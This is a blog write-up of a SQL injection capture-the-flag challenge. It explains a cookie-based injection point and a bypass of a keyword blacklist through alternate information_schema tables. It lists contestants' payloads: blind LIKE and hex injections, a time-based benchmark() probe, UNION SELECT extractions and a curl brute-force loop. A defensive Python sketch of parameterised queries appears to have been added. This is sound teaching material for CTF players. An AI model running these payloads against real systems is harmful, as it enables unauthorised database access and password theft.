Blog July 14, 2012

Solutions for challenge 2A

A detailed explanation of the SQL Injection challenge 2A and the many solutions used to solve this challenge.


After receiving many submissions for the SQL Injection challenge 2A, I decided it was time to show some of the solutions used to solve this challenge. In case you missed out on the series of SQL Injection challenges I released a few months ago, they are currently still online and available to try out. There are 3 challenges, each with part A and B. Out of all the challenges, challenge 2A ended up being one of the easier ones and since the solutions didn't vary too much, I decided to pick this challenge to be the first to show the solutions to.


Explanation

DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

What differentiates this challenge from the other challenges is that it allows you to log in as guest. In doing so, a welcome message is displayed showing the username and privileges and the cookie user_id is created. The cookie user_id, as the name says, has the id of the user, which in the case of guest is 1. If the value of the cookie is changed to 0, the message will now display admin as the username with administrator privileges. This is an indication that the username and privileges are determined from the user_id cookie, which is of course pulling that information from the MySQL database. Now that we know the injection point is in the cookie user_id, the next step is to figure out which characters are allowed and which are filtered.

The main idea behind this challenge is to figure out a way to retrieve the table/column names without using information_schema.tables/columns. For this reason, I decided to use very little filtering. Initially I had only blacklisted the following characters:

$blacklist = array('tables', 'columns', '(', ')');

Many WAFs rely on blocking the keywords 'tables' and 'columns', so I wanted to demonstrate that an attacker doesn't need those keywords in order to obtain the table/column names; I later added mysql_real_escape_string() as an extra layer of difficulty. Basically there are several other tables we can obtain the table/column names from other than information_schema.tables/columns, which are the two widely known ones. The only condition is that some require that the table/column have a key, and since each table should have a primary key, chances are high that this will work. Some examples are:

information_schema.key_column_usage

information_schema.table_constraints

information_schema.statistics

information_schema.partitions
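To show why the challenge's blacklist plus mysql_real_escape_string() is not a fix when the cookie lands in an unquoted numeric context, here is an added Python sketch (not the challenge's PHP, and the table/column names and sqlite3 stand-in are assumptions): it builds the query the challenge-style code would send, and beside it the hardened version that allow-list validates user_id as a decimal integer and binds it as a parameter.

```python
import re
import sqlite3

# Constructed stand-in for the challenge's users table; sqlite3 keeps the example
# offline. Table and column names are assumptions, not the challenge's real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, privs TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                   [(0, "admin", "constructed-secret", "administrator"),
                    (1, "guest", "guest", "guest")])
    return db

BLACKLIST = ("tables", "columns", "(", ")")   # the challenge's original filter

def escape_quotes(value):
    """Rough stand-in for mysql_real_escape_string(): escapes quotes and backslashes.
    This only helps when the value sits inside quotes, which user_id never does."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def build_vulnerable_query(cookie):
    """Challenge-style construction: blacklist check, escape, then concatenate unquoted.
    Returns the SQL text that would be sent, or None if the blacklist blocked it."""
    if any(tok in cookie.lower() for tok in BLACKLIST):
        return None
    return "SELECT username, privs FROM users WHERE user_id=" + escape_quotes(cookie)

def parse_user_id(cookie):
    """Allow-list validation: the cookie must be a short decimal integer, nothing else."""
    if re.fullmatch(r"[0-9]{1,9}", cookie) is None:
        return None
    return int(cookie)

def lookup_hardened(db, cookie):
    """The validated integer is bound as a parameter, so cookie text never reaches
    the SQL parser; anything that is not a plain id is rejected before the query."""
    user_id = parse_user_id(cookie)
    if user_id is None:
        return None
    row = db.execute("SELECT username, privs FROM users WHERE user_id=?", (user_id,))
    return row.fetchone()
```

Logging every cookie value that parse_user_id() rejects is a cheap detection signal for this class of probing, since a legitimate client only ever sends digits.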

Some of the solutions I received used a method I had not anticipated when writing the challenge. This type of solution guessed the column name and extracted the password through a blind SQLi. In hindsight I should have added a prefix to the column names, so they couldn't be guessed as easily. However, I did learn something because of it: I knew the LIKE statement doesn't require quotations; what I didn't know is that you could use the wildcards % and ? without the quotations. Below are the solutions that were submitted:


Solutions

Raz0r/BlackFan:

Solution omitted as it can be used to solve challenge 2B.

First Category

FluxReiners:

user_id=0 and username='admin' and mid(password,1,1)='e'

Team Rebel:

user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))

p____h:

user_id=0 and password LIKE "el%uitas"

NULL Life:

Submitted a PHP script found here.

mortis:

user_id=0 and username=0x656c25

tlk:

user_id=-1 OR password LIKE BINARY 0x{chars}25

g4mm4:

user_id=0 and password like binary 0x456c25

Submitted a Python script found here.

w00d:

user_id=0 and password like 0x[blind-here]25

gijs:

userid=0 and password >= BINARY 0x41

Karion:

for i in {2,3,4,5}; do for j in {0,1,2,3,4,5,6,7,8,9,0,A,B,C,D,E,F,G} ; do echo $i$j ; curl http://50.57.51.240/challenges/2A/challenge.php -b "user_id=0 and password LIKE 0x454C5F564552475549544153${i}${j}25" 2>&1 | grep ADMIN ;done ;done

Second Category

Sebastien Blot:

userid=-1+union+select+1,2,table_name,4+from+information_schema.key_column_usage+limit+2,1--

Miroslav Stampar:

user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3

Paul da Silva:

userid=-1 union select null,COLUMN_NAME,TABLE_NAME,null from information_schema.KEY_COLUMN_USAGE where table_name<>0x7265676c6173 and table_name<>0x72756c6573 limit 0,1-- 

Dominus:

user_id=0+and+0=1+union+select+1,2,table_name,4+from+information_schema.statistics+limit+2,1 


A full list of the victors for each challenge is available here.
